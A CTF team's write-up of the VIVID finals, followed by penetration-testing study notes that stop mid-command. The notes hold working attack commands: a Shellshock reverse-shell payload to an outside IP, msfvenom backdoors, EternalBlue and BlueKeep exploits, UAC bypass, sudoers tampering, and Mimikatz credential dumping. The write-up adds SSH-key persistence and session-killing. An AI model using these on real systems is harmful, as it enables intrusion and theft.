[~]$ whoami

Intro Dhanraj Chavan, Jeetesh Gowder, Mayank Ramnani, Pratham Gupta & Sourabh Rajguru participated in the VIVID CTF finals organized by NCAE. We advanced through the qualifications and competed in the in-person finals held in Augusta, Georgia. The competition spanned four days and featured various events: a jeopardy-style CTF, red team challenges, blue team challenges, and a king-of-the-hill round. We secured 5th place in the finals among 15 teams. They provided us with fully functional Kali Linux and Windows machines, which we could access directly through our web browsers, similar to HackTheBox Pwnbox. Therefore, we don’t have the solver scripts, but we will explain the challenges in detail. ...

Intro Challenges were categorized into common CTF domains—Reverse Engineering, Web Exploitation, Binary Exploits, Cryptography, Digital Forensics, and Networking. One of the hard challenges was, Binary Challenge We began by loading the binary into Binary Ninja to understand what it did and where it might be vulnerable. We found that the binary was protected with common security measures: non-executable stacks, stack canaries, and Address Space Layout Randomization (ASLR). These would make a simple buffer overflow attack much harder. Then, we noticed a function that handled user input in a suspicious way. It read more data than expected and wrote it into a fixed-size buffer. This hinted that we might be able to overwrite important data next to that buffer, maybe something like a function pointer stored in the Global Offset Table (GOT). We needed a memory address leak to get past ASLR. The binary did print out some debugging info, which included a memory address. With that address, we could figure out where libc was loaded in memory. With NX enabled, we couldn’t just put our shellcode on the stack. Instead, we used a ROP chain to call system("/bin/sh") from libc. Hence using a python script using pwntools, First we leak the memory address of puts and using this we get libc’s base address. Using this, we get system and bin sh address using: libc_base = leak - libc.symbols['puts'] system_addr = libc_base + libc.symbols['system'] bin_sh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))) Then to craft the ROP payload, First we find a gadget like pop rdi; ret using ROPgadget Then, push the address of /bin/sh onto the stack so that pop rdi; ret sets rdi to /bin/sh Finally, call system() to run the shell. payload = b'A' * offset payload += p64(rop.chain())

Intro We were given multiple linux and windows machines to attack and gain flags, each challenge set us up for the next few challenges, one of the hard challenges was: Gaining Access to Emails on Windows We had several windows machines in the subnet but we had to access emails of the user “Joe” on one of the machines. We had credentials for one of the windows machines from a previous web challenge based on sql injection which was solved by running sqlmap on the login page. To access any of the windows machines, we had to use Remote Desktop Protocol (RDP). After logging in through RDP, our account didn’t have administrator privileges and we had limited remote tooling. We then started enumeration, we noticed Joe under C:\Users\ but didn’t have access to any of the files. We tried using proxychains first as we had access to another windows machine which was in the same network as this windows machine but after wasting 1 hour on it and making the connection work, even that machine didn’t have access to Joe’s account. Then we noticed one of the applications installed was Mozilla Thunderbird, an email client. The challenge said to find the emails so maybe this might be the way. Thunderbird stores each user’s emails, account details, and saved credentials within their own profile directory, typically found at: C:\Users\<username>\AppData\Roaming\Thunderbird\Profiles\<randomstring>.default\ Thunderbird holds several key files: prefs.js: Configuration and account settings key4.db and logins.json: Encrypted saved passwords .mab / sqlite files: Address books and other metadata Mail/ImapMail: Containing the actual stored emails in MBOX or Maildir-like formats But we still needed Joe’s local password, we found this on the system login log files which were not stored securely as it was in the backups directory. Now we logged in through Thunderbird using Joe’s credentials, then we were able to see his emails but the contents were encrypted. Then using Cyberchef, we decrypted it using the Blowfish decrypt tool. Then we finally got the flag.

Intro Blue team challenges were comparatively easier than the other days as most of it included analyzing log files, pcap files and firewall configurations. One of the interesting challenges was: Detecting a Brute-Force Attack from Windows Logs We started by looking at the Windows Event Logs. Specifically, we focused on the Security and System logs since they record information about login attempts and network connections. To open these logs, we used the built-in Event Viewer on Windows. The logs contain thousands of entries, making it hard to spot suspicious activity at first glance. We applied filters to look for events that indicated failed login attempts. In Windows, these typically show up as events with certain IDs (for example, Event ID 4625 for failed logins). Once we isolated failed login attempts, we noticed a pattern, a single IP address showing up repeatedly, trying to log in to the system within the same timeframe. Normal users don’t fail logins so many times in a row, especially not that quickly. Within the event details, we found fields that listed the source IP address. This is the address from which the attack attempts were made. By examining related firewall logs or the event’s network information, we also identified the port that was being targeted, 3389 Remote Desktop Protocol (RDP) We counted how many failed login events came from the same IP within a certain time frame. The logs clearly showed many coming in the same second. Then we got the flag after we gave the right answer to the question, State the number of login attempts made using brute forcing? We learned how to use event viewer to find the right logs to analyze and how to read and extract data from log files.

Intro King of the Hill (KotH) Challenges involve a user taking control of a server and leaving their identifier on a specified target server/application. This indicates which user/team has control of the server. Network 1. Team Subnets: Each team has a subnet containing: 1 Boundary Vyos Router at .1 IP, which connects to the Hill Subnet. 5 Kali Linux Systems for offensive actions. 1 Flag Server at .100 IP, where each team needs to place their CTF ID in owner.txt to score points. 2. Hill Subnet (192.168.20.0/24): Contains vulnerable Linux, Windows 10, and Windows 11 flag servers. Also includes a Big Hill server that awards 3 points per poll if captured. Off-limits Hill (VIVID Flag): A restricted flag that incurs penalties if captured. 3. Access Control and Credentials: Each team’s boundary router can be accessed via SSH on port 22 using vividctf:vividctf. Each team’s flag server is accessible via SSH on port 22222 with vividctf:vividctf. Boundary routers block external incoming traffic on ports 22 and 3389 by default. Each team is allowed to sabotage others by modifying configurations, except on their Kali systems. 4. Objective: Teams need to place their CTF ID in the owner.txt file on their own flag server and on as many Hill Subnet flag servers as possible. Points are awarded every 60 seconds based on the contents of owner.txt files in each server. Each team can reach the Hill Subnet as well as other teams’ subnets, enabling cross-network attacks and defenses. Action Plan: 1. Planning and Team Strategy At the outset, we conducted a team discussion to devise an action plan. Roles were distributed as follows: 2 members focused on attacking: Their goal was to target opponent systems and the Hill subnet. 2 members focused on defending: They ensured the security of our subnet and servers. 1 member focused on reconnaissance: This role was crucial for gathering intelligence on other teams and the Hill subnet. 2. Initial Target: Routers Our first target was the boundary routers of other teams. By compromising their routers, we aimed to disrupt their communication and gain a strategic advantage. This step ensured we could manipulate or observe network traffic as needed. 3. Hill Subnet Reconnaissance After running a host scan on the Hill subnet, we discovered multiple machines with active services. To identify the services running on these machines, we executed a service detection scan using the following command: nmap -iL hill.txt -p- -sV 4. Discovery of Unusual Activity During the scan, one machine stood out with over 500 open ports in the range of 32000 to 60000. Nmap failed to identify the specific services on these ports due to the use of decoys, which masked the actual services. 5. Flag Server Review When we obtained access to our flag server, we conducted a thorough review of all the open ports and running services on the machine. We found that there was a Python service running on a randomized port between 40000-60000 which could grant anyone backdoor access to the machine given a correct string input payload. Our assumption was that the initial state of all the flag servers in the competition would be the same, and thus the backdoor would exist on flag servers of all teams. 6. Automated Port Scans Our assumption was proven correct when we did a port scan in the range 40000-60000 on other team’s flag servers, and found one port giving us different output than the others. This was done using the following command: for port in {40000..60000}; do nc 192.168.2.100 $port; done This allowed us to iterate through the ports and look for unexpected responses. 7. Exploiting a Backdoor Once the port was identified, exploiting the backdoor was as simple as crafting a payload that was sent after we established a connection using the above netcat command. The backdoor gave us a limited /bin/sh shell, which we transformed into a full fledged shell with: /bin/bash -i Thus, now we had full access to the flag servers of multiple teams. We also made sure to patch the running backdoor on our flag server so as to not be compromised the same way by other teams. 8. Claiming Flag Servers The scoring system of the competition was based on which team’s flag was in the /root/owner.txt file of each flag server. Initially, we edited the owner.txt file to claim ownership and earn 3 points per minute. However, we couldn’t establish persistence, and an opposing team eventually removed our access by stopping our shell process and patched the backdoor. 9. Web Server Exploitation On further analysis of the flag server, we also discovered a running web server. Nmap scan report for 192.168.2.100 Host is up (0.00048s latency). Not shown: 999 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Node.js Express framework Through reconnaissance and testing, we identified a command injection vulnerability in the web application. Exploiting this vulnerability, we regained access to the machine through this alternative vulnerability. 10. Establishing Persistence This time, so as to not get kicked out of the flag servers by opposing teams, our first goal was to establish persistence. This was done via a few steps: Putting our ssh public key in ~/.ssh/authorized_keys: echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqIvZaOr0exvLzNtjueoj3qyYydaHFgSgbjn3OqE6XVgydjIP4cIfN2xOxrT56JQODsoBya8HLrRrejNaLw6sK+8+8Vh+J/kp5Qb3J4kmVdosvWhWV/QWlTlmVassAwz0laZHTZucbYtH45zJ9RpjWpgbBCmgc8s5LN+88ZQcob17F0+r/GeBH+3KBzV/CccPV+0nQ2Umr94UDqixDUMEI1oOmi88jV/EUVIgP9l8Wjz0AfcCLKG0mT7EIiQpPsN2GfYQ0lcJBpp2+OIcqwZ7q4DgGQOz1OKgbTemC3XZ6fGsNxtbrdzGvwKo4c3LLm/DKI5hVx826NiWikNNox/9kM1VipqfnOozsQLdN6CjGUarExlsvHb6iP/UHHc537jB3ZiYHKHeE1tbkiBFKOAFHfw8VkY+s7SQCcMLOuID91epMUQoKIp2pXU88wYEQuf7t0J/9/pJRbaK8VI+mVPCSVcZ5K2zSw+J/W3qVpIjnGuqPK8bJa0ftGfqgXBBPkk0= mayank” > ~/.ssh/authorized_keys Changing the root password to something only our team knew Kicking all the other people on the server by terminating their bash processes using the following command: current_pid=$$; for pid in $(pgrep -x bash | grep -v "$current_pid"); do kill -9 $pid; done Doing this on a few flag servers, we now had full exclusive access to multiple flag servers. 11. Locked Permissions and Claiming Flags Upon regaining persistent access, we found that the permissions on owner.txt had been locked using the chattr command, making it read only and preventing us from modifying the file. We discovered this by getting errors when writing to the file even though we were root, the file was owned by root and the file had permissions 0o644. On checking the file using lsattr we confirmed that the write attribute had been removed, thus we needed chattr to add the write attribute back to the file. Additionally, the chattr command was also removed from its original location in the /bin/ directory. This step, likely implemented by the opposing team before we kicked them, was to mitigate our attempts to claim points. However, on searching for the whole chattr binary in the whole filesystem, we found it hidden in a randomly named directory: find / -name chattr 2>/dev/null Output: /var/7cy7grc93q97c/chattr Using the chattr binary, we changed the attributes of the owner.txt file such that we could have write access, and put our flag in the file to start gaining points. We also used chattr to remove write access from the owner.txt file from ours and other flag servers that we pwned just to make it difficult for an opposing team to change this file even if we lose access somehow. But that did not happen. Summary Before the King of the Hill segment of the competition, we were in 11th place. But after the King of the Hill, our team ended up in 5th place. Being fast, constantly monitoring the machines we owned for any suspicious activity, and constantly attacking other teams ensured that we did very well in the part of the competition, leading to substantial gaining of ranks. We learned about conducting reconnaissance, finding vulnerabilities through code review, exploiting servers through known vectors and maintaining persistence after compromising a machine through this competition. ...

Assessment Methodologies Passive Information Gathering Website Recon & Footprinting IP Addresses host <domain> Directories robots.txt sitemap.xml Names Emails Phone Numbers Physical Addresses Web Technologies Used BuiltWith → Firefox Addon (Recommended) Wappalyzer → Extension whatweb <domain> → Linux Tool webhttrack → Website Copier Whois Enumeration https://who.is website whois <domain> Website Footprinting with Netcraft https://netcraft.com DNS Recon dnsrecon -d <domain> → Kali Linux Tool https://dnsdumpster.com/ WAF wafw00f Subdomain Enumeration Sublist3r Google Dorks cache:ine.com Exploit-DB Dorks Email Harvesting theHarvester Leaked Password Databases HaveIBeenPwned? Active Information Gathering DNS Zone Transfer /etc/hosts → Local DNS dnsenum dig fierce nmap netdiscover Footprinting & Scanning Active Information Gathering Host Discovery Techniques Ping Sweeps → ICMP Echo Requests → Tool: fping fping -a -g 10.10.23.0/24 ARP Scanning TCP SYN Ping → Half-Open Scan UDP Ping TCP ACK Ping SYN-ACK Ping → Sends SYN-ACK packets NMAP Scripts → /usr/share/nmap/scripts/ Firewall/IDS Evasion -f → Fragments IP packets -D → Decoy -Pn vs -sn -sn → tells Nmap not to scan any ports → forcing it to rely primarily on ICMP echo packets → to identify targets -Pn Types of Scans: TCP Connect Scans (-sT) SYN “Half-open” Scans (-sS) UDP Scans (-sU) TCP Null Scans (-sN) → sent with no flags set at all As per the RFC, the target host should respond with a RST if the port is closed. TCP FIN Scans (-sF) → a request is sent with the FIN flag (usually used to gracefully close an active connection) Nmap expects a RST if the port is closed. TCP Xmas Scans (-sX) → send a malformed TCP packet and expects a RST response for closed ports. If a UDP port doesn’t respond to an Nmap scan, it will be marked as open|filtered NULL, FIN and Xmas → Firewall Evasion Microsoft Windows → may respond to a NULL, FIN or Xmas scan with a RST for every port Zenmap: Green → Machine is alive Red → Machine is alive but not responding or not directly accessible Yellow → We have launched the scan (that is, the attacker machine) and it has plotted the other hosts connection with hostname and IP addresses to localhost. nmap -Pn -p 134,177,234 -sUV 192.156.4.3 --script=discovery FFUF You could also use any custom keyword instead of FUZZ, you just need to define it like this wordlist.txt:KEYWORD ffuf -u http://10.10.199.197/NORAJ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt:NORAJ generic list of files such as raft-medium-files-lowercase.txt ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt To hide the progress: 2>/dev/null Directories: ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt By adding -fc 403 (filter code) we’ll hide from the output all 403 HTTP status codes. -mc 200 → Only shows 200 -fr → Filter regexp Audit https://cisofy.com/lynis/ Penetration Testing Windows Vulnerabilities Windos IIS - Port 80, 443 WebDAV - Port 80, 443 SMB/CIFS - Port 445 RDP - Port 3389 WinRM - Port 5986/443 Exploit - WebDAV IIS nmap -sV -p 80 --script=http-enum <target> hydra -L <username-list> -P <password-list> <target> http-get /webdav/ davtest -auth user:password -url <url> cadaver <url> → Enter username & password put <webshell-path> Webshells → /usr/share/webshells dir C:/ & type C:/<filepath> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f asp > shell.asp service postgresql start && msfconsole use multi/handler → Use to setup a listener for payload you created with msfvenom set payload windows/meterpreter/reverse_tcp show options set LHOST & LPORT & Run Exploit - SMB : PSExec nmap -sV -sC <target> scanner/smb/smb_login psexec.py Administrator@192.168.1.1 Usernames: /usr/share/metasploit/data/wordlists/common_users.txt exploit/windows/smb/psexec Exploit - SMB : Eternal Blue(MS17-010) https://github.com/3ndG4me/AutoBlue-MS17-010 cd Shellcode ./shell_prep.sh → Enter Y, Your IP, LPORT, Regular Shell, Stageless nc -lvnp 1234 python eternalblue_exploitX.py <target IP> shellcode/sc_x64.bin Method 2 : Metasploit use windows/smb/ms17_010_eternalblue Exploit - RDP use auxiliary/scanner/rdp/rdp_scanner → Set RHOST & RPORT → To detect RDP hydra -L <username-wordlist> -P <password-wordlist> rdp://<target> -s <PORT> xfreerdp /u:<username> /p:<password> /v:<target>:<port> Exploit - WinRM Port → 5985 crackmapexec winrm <target-ip> -u <username> -p <wordlist-path> crackmapexec winrm <target> -u <username> -p <password> -x <command> evil-winrm.rb -u <username> -p <password> -i <target> use exploit/windows/winrm/winrm_script_exec set FORCE_VBS true set username & password exploit > use auxiliary/scanner/winrm/winrm_auth_methods > use auxiliary/scanner/winrm/winrm_login > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt > set VERBOSE false > use use auxiliary/scanner/winrm/winrm_cmd > set USERNAME administrator > set PASSWORD tinkerbell > set cmd whoami > run > use exploit/windows/winrm/winrm_script_exec > set USERNAME <> > set PASSWORD <> > set LHOST <IP> > set FORCE_VBS true > run > sysinfo Privilege Escalation Windows Windows-Exploit-Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester Copy sysinfo to a txt file ./windows-exploit-suggester.py --update ./windows-exploit-suggester.py --database <filename.xls> --systeminfo <path-to-txt-file> Windows-Kernel-Exploits - https://github.com/SecWiki/windows-kernel-exploits Download the specific exploit Upload this exploit using Meterpreter shell → .\<exploit>.exe Meterpreter → getsystem → Escalate Privileges use multi/recon/local_exploit_suggester → To find out vulnerable exploits Exploit - UAC UAC → User Access Control → Windows Security Feature → Used to prevent unauthorized changes from being made to the OS It ensures that changes to the IS require approval from admin or a user account that is part of admin group https://github.com/hfiref0x/UACME net users net localgroup administrators use exploit/windows/http/rejetoo_hfs_exec pgrep explorer → Digit migrate <digit> → Change x86 to x64 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f exe > backdoor.exe upload backdoor.exe upload /root/Desktop/Tools/UACME/Akagi64.exe .\Akagi64.exe 23 C:\Temp\backdoor.exe Enumeration Importing Nmap results into MSF service postgresql start msfconsole msf> db_status msf> workspace msf> workspace -a <name> // Create a new workspace msf> db_import <path_to_file> msf> hosts // Check whether the data imported successfully msf> services // Check whether the data imported successfully msf> db_nmap -Pn -sV -o 10.4.22.173 // Results will be saved in MSF DB Port Scanning with Auxiliary Modules service postgresql start msfconsole msf> workspace -a portscan msf> search portscan msf> use <module_name> / <index> // scanner/portscan/tcp msf> show options msf> set RHOSTS 192.168.100.43 // TARGET IP msf> curl <> // If HTTP is open msf> search xoda msf> use <index/module_name> msf> show options msf> set RHOSTS <TARGET IP> msf> set TARGETURI / -> // Set the path where service is hosted msf> exploit // It will give meterpreter session mp> sysinfo // Target Infomation mp> shell // Open shell session bash> ifconfig // Identify next target address (x.x.x.x+1) bash> exit // CTRL + C mp> run autoroute -s <IP> // IP of one of the machine in subnet -> Add route mp> background // Will take this session in Background msf> sessions // View current sessions msf> search portscan msf> set RHOSTS <TARGET_2> // Target 1+1 (x.x.x.x+1) msf> run msf> back msf> search udp_sweep ERROR: [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? SOLUTION: SET LHOST <BASE_MACHINE_IP> // Attacker IP FTP Enumeration msf> search type:auxiliary name:ftp msf> use auxiliary/scanner/ftp/ftp_version msf> use auxiliary/scanner/ftp/ftp_login msf> set RHOSTS <IP> msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt msf> run msf> use auxiliary/scanner/ftp/anonymous SMB Enumeration msf> setg RHOSTS <IP> // Setting a Global variable msf> search type:auxiliary name:smb msf> use auxiliary/scanner/smb/smb_version msf> use auxiliary/scanner/smb/smb_enumusers msf> info // See info about module msf> use auxiliary/scanner/smb/smb_enumshares msf> set ShowFiles true msf> use auxiliary/scanner/smb/smb_login msf> set SMB_USER admin msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt bash> smbclient -L \\\\<IP>\\ -U admin // -L: List all shares bash> smbclient \\\\<IP>\\<share> -U admin // Replace share name Web Server Enumeration msf> setg RHOSTS <IP> msf> setg RHOST <IP> msf> search type:auxiliary name:http msf> use auxiliary/scanner/http/http_version msf> use auxiliary/scanner/http/http_header msf> use auxiliary/scanner/http/robots_txt msf> use auxiliary/scanner/http/dir_scanner msf> use auxiliary/scanner/http/files_dir msf> use auxiliary/scanner/http/http_login msf> set AUTH_URI <dir> // Replace dir that you want to bruteforce credentials msf> unset USERPASS_FILE msf> run msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt msf> set VERBOSE false msf> run msf> use auxiliary/scanner/http/apache_userdir_enum msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt msf> echo "<username>" > user.txt msf> use auxiliary/scanner/http/http_login msf> set USER_FILE /root/user.txt MySQL Enumeration // MySQL - TCP Port 3306 msf> use auxiliary/scanner/mysql/mysql_version msf> use use auxiliary/scanner/mysql/mysql_login msf> set USERNAME root msf> set PASSFILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt msf> set VERBOSE false msf> run // It will bruteforce passwords // auxiliary/admin/ -> This admin modules requires credentials msf> use auxiliary/admin/mysql/mysql_enum msf> set PASSWORD <password> // This module requires creds msf> set USERNAME root msf> run msf> use auxiliary/admin/mysql/mysql_sql msf> set USERNAME root msf> set PASSWORD <password> msf> set SQL show databases; msf> use auxiliary/scanner/mysql/mysql_schemadump msf> set USERNAME root msf> set PASSWORD <password> bash> mysql -h <IP> -u root -p SSH Enumeration msf> search type:auxiliary name:ssh msf> use auxiliary/scanner/ssh/ssh_version msf> use auxiliary/scanner/ssh/ssh_login // Password Auth msf> use auxiliary/scanner/ssh/ssh_version_pubkey // Key-Pair Auth msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt msf> sessions <number> msf> /bin/bash -i bash> ls msf> use auxiliary/scanner/ssh/ssh_enumusers msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt SMTP Enumeration msf> search type:auxiliary name:smtp msf> use auxiliary/scanner/smtp/smtp_version msf> use auxiliary/scanner/smtp/smtp_enum Vulnerability Assessment Frequently Exploited Windows Services Microsoft IIS → Port 80/443 → Web Server WebDAV → Port 80/443 → HTTP Extension that allows clients to update, delete, move & copy files on web server SMB/CIFS → Port 445 → Network File Sharing Protocol RDP → Port 3389 → Remotely authenticate & interact with Windows system WinRM → Port 5986/443 → Windows remote management protocol MSF Vulnerability Scanning bash> searchsploit "Microsoft Windows SMB" bash> searchsploit "Microsoft Windows SMB" | grep -e "Metasploit" metasploit-autopwn > wget https://github.com/hahwul/metasploit-autopwn/blob/09320cc637bf363a79a565e4ff3a58a50020ac6f/db_autopwn.rb > mv db_autopwn.db /usr/share/metasploit-framework/ > load db_autopwn (msf) > db_autopwn -p -t > db_autopwn -p -t -PI 445 > analyze MS17-010 SMB Vulnerability (EternalBlue Exploit) EternalBlue → Collection of Windows Vulnerabilities & exploits that allow attackers to remotely execute arbitrary code & gain access to a Windows System Affected Versions Vista, 7, Server 2008, 8.1, Server 2012, Windows 10, Windows Server 2016 > nmap -sV -p 445 -O <IP> > nmap -sV -p 445 --script=smb-vuln-ms17-010 <IP> > git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git > cd <DIR> > pip install -r requirement.txt > cd shellcode && chmod +x shell_prep.sh > ./shell_prep.sh // 1. Type Y 2. Enter LHOST IP 3. Enter LHOST port 4. Type 1(Regular CMD Shell) 5. Type 1 (Stageless payload) -> sc_x86.bin / sc_x64.bin > cd .. > chmod +x eternalblue_exploit7.py > nc -nvlp 1234 > python eternalblue_exploit7.py <IP> shellcode/sc_x64.bin // Method 2 msf> search eternalblue msf> use exploit/windows/smb/ms17_010_eternalblue msf> set RHOSTS <IP> BlueKeep (Windows CVE-2019-0708 RDP Vulnerability) Allow attackers to remotely execute arbitrary code & gain access to a Windows system & consequently the network that the target system is part of > sudo nmap -p <IP> msf> search BlueKeep msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep msf> set RHOSTS <IP> msf> run msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce msf> set RHOSTS msf> exlpoit PassTheHash Attack msf> service postgresql start && msfconsole msf> search badblue msf> use exploit/windows/http/badblue_passthru msf> set RHOSTS <IP> msf> exploit mp> pgrep lsass mp> migrate 780 mp> getuid mp> load kiwi mp> lsa_dump_sam // Administrative NTLM Creds msf> use exploit/windows/smb/psexec msf> set LPORT <PORT> msf> set RHOSTS <IP> msf> set SMBUser Administrator msf> set SMBPass <LMHash>:<NTLM Hash> msf> set target Native\ upload msf> exploit // Method 2 > crackmapexec smb <IP> -u Administrator -H <NTLM Hash> > crackmapexec smb <IP> -u Administrator -H <NTLM Hash> -x "ipconfig" Shellshock (Bash CVE-2014-6271 Vulnerability) Allows an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell. > nmap -sV <IP> > nmap -sV <IP> --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" > > Capture this request in Burp > User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd' > nc -nvlp 1234 > User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.24.241.2/1234 0>&1' msf> search shellshock msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec msf> set RHOSTS <IP> msf> set TARGETURI /gettime.cgi msf> exploit Vulnerability Scanning Nessus sudo dpkg -i Nessus.deb // Download from Nessus Website sudo systemctl start nessusd.service WMAP msf> setg RHOSTS <IP> msf> load wmap msf> wmap_sites -a <IP> msf> wmap_targets -t http://<IP> msf> wmap_sites -l msf> wmap_targets -l msf> wmap_run -t msf> Windows Privilege Escalation Windows Kernel Exploits Windows-Exploit-Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester windows-kernel-exploits: https://github.com/SecWiki/windows-kernel-exploits msf> getsystem // command to run privilege escalation msf> use post/multi/recon/local_exploit_suggester msf> set SESSION <Number> msf> run Bypassing User Account Control (UAC) In order to bypass UAC, you need to have access to a user account that is a part of the local administrative group on the Windows target system. UACMe: https://github.com/hfiref0x/UACME > net users > net localgroup administrators > setg RHOSTS <IP> > search rejetto > run > sysinfo // 32-bit mp session > pgrep explorer > migrate <ID> > sysinfo // 64-bit mp session > shell > net user > net localgroup administrators > // MSF : UACME > use multi/handler > set payload windows/meterpreter/reverse_tcp > set LHOST <IP> > set LPORT <Port> > run // Create Payload > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe 'backdoor.exe' // Continue Previous Session > pwd > getuid > getprivs > cd C:\\ > mkdir temp > cd temp > upload backdoor.exe > upload /root/Desktop/tools/UACME/Akagi64.exe > shell > dir > Akagi63.exe 23 C:\\temp\backdoor.exe It will connect to lister > getuid > getprivs > getsystem > hashdump Access Control Impersonation Windows Access Tokens: Responsible for identifying & describing the security context of a process or thread running on a system. Access tokens are generated by the winlogon.exe process every time a user authenticates successfully & includes the identity & privileges of the user account associated with the thread or process. Privileges: SeAssignPrimaryToken: This allows a user to impersonate tokens SeCreateToken: This allows a user to create an arbitrary token with an administrative privileges. SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges. > nmap <IP> > search rejetto > set RHOSTS <IP> > exploit > sysinfo > pgrep explorer > migrate <ID> > getuid > getprivs > use incognito > list_tokens -u > impersonate_token <Name> > getuid > pgrep explorer > migrate <ID> Alternate Data Streams (ADS) ADS is an NTFS file attribute & was designed to provide compatibility with the macOS HFS Any file created on an NTFS drive will have two different forks/streams: Data Stream → Default stream that contains data of the file Resource Stream → Typically contains metadata of the file Attackers can use ADS to hide malicious code or executables in legitimate files in order to evade detection Unattended Windows Setup Config Files: C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Autounattend.xml > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f exe > payload.exe > python -m SimpleHTTPServer 80 // Windows > cd Desktop > certutil -urlcache -f http://<Kali>/payload.exe payload.exe > msfconsole > use multi/handler > set payload windows/x64/meterpreter/reverse_tcp > set LHOST <IP> > set LPORT 1234 > run // Execute the payload in Windows > search -f unattend.xml > cd C:\\Windows\\Panther > download unattend.xml > vim password.txt > base64 -d password.txt > psexec.py Administrator@<IP> // Enter password // Windows: runas.exe /user:Administrator cmd // Enter password Dumping Hashes with Mimikatz Mimikatz: Windows Post Exploitation tool → Allows for the extraction of clear-text passwords, hashes & Kerberos tickers from memory. > nmap -sV <IP> > msfconsole > search badblue > use exploit/windows/http/badblue_passthru > set RHOSTS <IP> > exploit > sysinfo > getuid > pgrep lsass > migrate <ID> > getuid > load kiwi > ? // Help Menu > creds_all // Dump all creds > lsa_dump_sam > lsa_dump_secrets > cd C:\\ > mkdir Temp > cd Temp > upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe > shell > dir > mimikatz.exe > privilege::debug > lsadump::sam > lsadump::secrets > sekurlsa::logonpasswords Linux Exploits FTP > nmap -sV <IP> > ftp <IP> // Check anonymous login > hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ftp > searchsploit proftpd SSH > hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ssh SAMBA SAMBA is a Linux implementation of SMB SAMBA allows Windows systems to access Linux shares & devices > nmap -sV <IP> > hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb > smbmap -H <IP> -u admin -p <password> > smbclient -L <IP> -U admin > smbclient //<IP>/shawn -U admin > ? > dir > smbclient //<IP>/nancy -U admin > get flag > ls > cat flag > smbclient //<IP>/admin -U admin > tar xzf flag.tar.gz > cat flag > enum4linux -a <IP> > enum4linux -a -u admin -p <password> <IP> Linux Privilege Escalation Linux Kernel Exploits Linux Exploit Suggester: https://github.com/The-Z-Labs/linux-exploit-suggester > sysinfo > getuid > shell > /bin/bash -i > cat /etc/passwd > // Quick Download: Linux Exploit Suggester > chmod +x les.sh > ./les.sh > Misconfigured Cron Jobs Cron → Time based service that runs applications, scripts & other commands repeatedly on a specific schedule In order to elevate our privileges, we will need to find & identify the cron jobs scheduled by the root user or the files being processed by the the cron job > whoami > groups <user> > cat /etc/passwd > crontab -l // List crontab for current user > ls -la > cd / > grep -rnw /usr -e "/home/student/message" > cat /tmp/message > ls -la /usr/local/share/copy.sh > cat /usr/local/share/copy.sh > printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh > sudo su SUID Binaries SUID → Set Owner User ID permission This permission provides users with the ability to execute a script or binary with the permissions of the file owner as opposed to the user that is running the script or binary SUID permissions are typically used to provide unprivileged users with the ability to run specific scripts or binaries with “root” permissions. The provision of elevate privileges is limited to the execution of the script & does not translate to elevation of privileges. > whoami > groups <user> > ls -la > file welcome > strings welcome > rm greetings > cp /bin/bash greetings > ./welcome > cat /etc/shadow Dumping Linux Password Hashes Prefix: $1 → MD5 $2 → Blowfish $5 → SHA-256 $6 → SHA-512 > nmap -sV <IP> > searchsploit proftpd > setg RHOSTS <IP> > search proftpd > use exploit/unix/ftp/proftpd_133c_backdoor > show options > set payload payload/cmd/unix/reverse > exploit > /bin/bash -i > id > // Go in background > sessions > session -u 1 > sysinfo > getuid > cat /etc/shadow // Get hash > use post/linux/gather/hashdump > show options > set SESSION 2 > run // Crack hash > use auxiliary/analyze/crack_linux > set SHA512 true > run Network-Based Attacks Firewall Detection & IDS Evasion > nmap -Pn -sS -F <IP> // -F -> Fast Scan > nmap -Pn -sS 